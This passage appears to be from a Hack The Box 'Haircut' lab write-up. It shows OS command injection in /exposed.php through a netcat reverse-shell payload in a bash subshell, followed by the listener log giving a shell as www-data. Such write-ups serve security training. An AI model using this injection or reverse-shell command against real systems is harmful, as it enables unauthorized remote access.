OS Command Injection
The /exposed.php file is likely using the direct curl command to call in other websites to include.
That is the reason why I am able to see the image in the webroot when entering the URL of it.
Problem arise as the file is using the OS command without a proper set of input sanitization despite of the few blacklisted characters and words
$(netcat 10.10.14.5 9998 -e /bin/sh)Sending in bash subshell with a reverse shell command in it
┌──(kali㉿kali)-[~/archive/htb/labs/haircut]
└─$ nnc 9998
listening on [any] 9998 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.24] 39572
whoami
www-data
hostname
haircut
ifconfig
ens160 link encap:Ethernet HWaddr 00:50:56:b9:91:bf
inet addr:10.10.10.24 Bcast:10.10.10.255 Mask:255.255.255.0
inet6 addr: fe80::250:56ff:feb9:91bf/64 Scope:Link
inet6 addr: dead:beef::250:56ff:feb9:91bf/64 Scope:Global
up broadcast running multicast mtu:1500 Metric:1
rx packets:993351 errors:0 dropped:72 overruns:0 frame:0
tx packets:988318 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
rx bytes:187319633 (187.3 MB) TX bytes:370905042 (370.9 MB)
lo link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
up loopback running mtu:65536 Metric:1
rx packets:160 errors:0 dropped:0 overruns:0 frame:0
tx packets:160 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
rx bytes:11840 (11.8 KB) TX bytes:11840 (11.8 KB)Initial Foothold established to the target system as the www-data user via OS command injection